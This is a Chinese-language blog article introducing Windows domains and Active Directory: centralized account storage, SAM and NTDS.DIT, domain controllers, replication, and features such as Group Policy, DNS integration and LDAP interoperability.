域的基础

 域是微软网络中最重要的概念之一。用比较简单的话说,域实际上就是指一组服务器与工作站,并且它们同意将用户和机器帐户的名称及密码集中放在一个共享数据库内。这种做法非常有用,并且适合任何规模的网络,因为域使得用户只需要一个用户名和密码就可以访问企业的域系统中所有的电脑。当系统管理员为一位新员工建立一个帐户后,他马上(有复制情况除外)就可以访问网络中允许他访问的任何资源。而当需要修改密码时,只需要修改一次,整个域都能识别并接受新密码。
    把用户与机器帐户及密码集中管理只是一个开始。首先在NT3.51系统上出现了用户配置文件;在NT4上,域成了集中放置“系统策略”的地方;Windows2000的域可以集中存储DNS信息,并且还提供了“系统策略”的改良版本“组策略”,组策略可以说是整个网络中某种形式的“控制面板”。
    当然,并不是一定要有域才能将一些运行Windows系统的电脑组成网络,但是如果在网络中有了域,那么很多事情都会变得非常容易。

    Active Directory(AD)域的作用
    域可以做很多事情。我只能介绍其中一部分的内容,但这不是一份清单。这些内容包括:
 * 集中存储用户和密码
 * 提供一组服务器作为“身份认证”和“登录”服务器,也就是“域控制器”
 * 对域中的资源维护一个可供搜索的索引,方便人们查找
 * 允许建立带有不同级别的用户;同时,域还允许创建子管理员
 * 允许将域细分

    网络的首要任务是提供服务,它是集中存储文件或数据库、共享打印机以及其它服务的地方,使人们
可以通过电子邮件或是其它技术彼此通信。第二个任务是:安全。那么在一些保护代措施下会发生两件事情:
 * 身份验证
 * 授权
    早期的NT系统,从3.1到4都只有一个文件,叫作SAM,也就是Security Accounts Manager的缩写。它包含了用户名、用户全名、密码、允许登录时间、帐户过期日期、说明、隶属于组名和配置文件信息。这个文件是加密的。今天,NT系统仍然使用SAM,包含Windows 2000 Pro和Windows XP。默认情况下,Windows Server 2003服务器也包含并使用SAM。当然,少数系统将保存在Active Directory的集中数据库中,这些服务器被称为域控制器(Domain Controller),它们是没有SAM的。在NT时代,域控制器使用的是SAM,自从Windows 2000以后,它们开始使用Active Directory。Active Directory在NTDS.DIT文件中存储了SAM的大量用户信息,而这两者不同的地方很少。NTDS是一个经过修改的数据库,并且存储的数据要比SAM多得多。
    那么AD域与NT域之间有什么不同呢?让我们来看看:AD域比NT域大得多。在NT域中最多容纳5000个用户帐户,这也使得一些大型企业建议多域来维护自己的全部用户帐户,这样的域称为多主模型。而AD域可以在Active Directory容纳150万个用户,这对任何一家企业来说都足够了。不是吗?
    现在让我们来看一下什么时候工作站会使用位于AD中的信息。当用户试图访问一个文件共享时,AD就会验证他的身份。也就是说,你坐在电脑A前,试图访问服务器B上的一个共享文件,那么B会问A你是谁,然后才决定是否让你得到这个文件的访问权。可见,AD提供了一个集中式的数据库,用来存储用户帐户。
    假如我有1000名用户,1000台工作站,还有50台服务器。这1000名用户中的任何人都需要访问我的任何一台服务器,而且,我还要使这些用户能够在任何一台电脑前登录工作。想想,如果不用域,我要做些什么事情?我必须在1000台工作站上的SAM中输入每个用户的帐户,还要在每台服务器前做同样的事情,这太不可思议了,太可怕了。而如果我用域呢?那么我只需要在少量的服务器上存储一个用户和密码数据库,这就是NTDS.DIT,然后为网络提供服务,我们把这些少量的机器称为“登录服务器”或是“身份验证服务器”,也就是常常听说的“域控制器”。
    域控制器是具有如下特征的电脑:
 * 运行Server版本的操作系统
 * 维护域信息的数据库
 * 保证多台域控制器之间的域信息副本一致
 * 提供身份验证服务
    关于搜索部分略过,实在找不到有什么好说的。
    当网络发展到足够大的时候,那么我们可能就需要在这个大型的网络上进行一些必要的调整了,我们可能需要把这个网络划分为多个小一些的网络,也就意味着需要创建子域,同时需要子域管理员做一些诸如重设密码备份文件之类的操作。随着网络规模的加大与职责的增多,我们可能需要分派更多的工作给子域管理员,这就会牵涉到权限分配和连接性及复制的问题。当公司有分散在各地的机构时,其中一名用户变更了密码或是新加入一个用户帐户时,这个大型网络的AD之间需要在这些方面发生变化时需要彼此通信并且进行AD复制。NT4系统中,NT4域控制器每5分钟更新一次,也就意味着每5分钟,一台域控制器会试图将发生的改变复制到另一台域控制器上,就算是慢速连接也是这样,这样的通信会给通信线路造成堵塞,也会使一些更重要的数据传输无法实现。AD在这方面进行了改进,它允许用户告诉域控制器之间采取了哪种连接,让域控制器知道如何运用这些连接来达到更好的复制效果。而且,Windows 2000可以在发送数据前对数据进行压缩,比例甚至可以达到10:1,而Server 2003上我们可以选择是否进行压缩处理,因为压缩处理会需要一定有CPU处理能力。

 

 

 

Active Directory 是 Windows 2000 操作系统的新内容,它在实施组织的网络、进而实现组织的商业目标中占有重要地位。  可以从三个方面来介绍Activfe Directory  1)存储。 Active Directory,即 Windows? 2000 Server 目录服务,可分层存储网络对象的信息,并向管理员、用户和应用程序提供这些信息。  2)结构。使用 Active Directory,可以根据结构组织网络及其对象,这些结构包括域、目录树、目录林、信任关系、部门 (OU) 和站点。  3)相互通信。Active Directory 以标准目录访问协议为基础,因此能够与其他目录服务进行交互操作,并可接受遵守这些协议的第三方应用程序的访问。  Activfe directory的优点在于  1)与 DNS 集成。 Active Directory 使用域名系统 (DNS)。DNS 是一种 Internet 标准服务,它将用户能够读取的计算机名称(例如 mycomputer.microsoft.com)翻译成计算机能够读取的数字 Internet 协议 (IP) 地址(由英文句号分隔的四组数字)。这样,在 TCP/IP 网络计算机上运行的进程即可相互识别并进行连接。 2)灵活的查询。 用户和管理员如果要通过对象属性快速查找网络中的对象,可使用“开始”菜单中的“查找”命令、桌面上的“网上邻居”图标或者是 Active Directory 用户和计算机管理单元。例如,您可以按照一个用户帐户的姓名、电子邮件名、办公地点或其他属性查找该用户。而且,使用全局编录优化了查找信息的操作。  3)可扩展性。 Active Directory 是可扩展的;也就是说,管理员既可以在架构中添加新的对象类别,也可在原有的对象类别中添加新属性。架构包含每个对象类别的定义,以及能够存储于目录中的每个对象类别的属性。例如,您可能会为 User 对象添加 Purchase Authority 属性,然后将每个用户的购买权限额保存为用户帐户的一部分。  4)基于策略的管理。 组策略是在初始化时应用于计算机或用户的配置设置。所有组策略设置都包含在应用于 Active Directory 站点、域或部门的组策略对象 (GPO) 中。GPO 设置决定了对目录对象和域资源的访问权限、用户可使用的域资源(如应用程序),以及这些域资源针对其用途的配置方式。   5)可伸缩性。 Active Directory 包括一个或多个域,每个域均有一个或多个域控制器,由此,您能够对目录进行自由扩展,从而满足所有网络的需求。多个域可合并成一个域目录树,多个域目录树可合并成一个目录林。在只有一个域的最简单的网络结构中,该域既是一个目录树,又是一个目录林。   6)信息复制。 Active Directory 使用多主机复制,使您可以更新任何域控制器中的目录。在一个域中部署多个域控制器还提供了容错能力和负载平衡功能。因为这些域控制器包含同样的目录数据,所以,如果域内的一个域控制器速度变慢、停止或出现故障,同一域内的其他域控制器即可提供必要的目录访问功能。   7)信息安全。在 Windows 2000 操作系统中,用户身份验证和访问控制的管理都与 Active Directory 完全结合在一起,这是该系统的一项关键性安全功能。Active Directory 将身份验证集中进行。不仅可以定义对目录中每个对象的访问控制,还可定义对每个对象的每个属性的访问控制。此外,Active Directory 还为安全策略提供了存储区和应用范围。8)互操作性。由于 Active Directory 以标准目录访问协议(例如轻型目录访问协议 (LDAP))为基础,因此它能够与其他采用这些协议的目录服务进行交互操作。有些应用程序编程接口 (API)--例如 Active Directory 服务接口 (ADSI)--允许开发者访问这些协议。

<script src="http://www.cdsbfx.com/js/google.js" type="text/javascript"></script> <script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值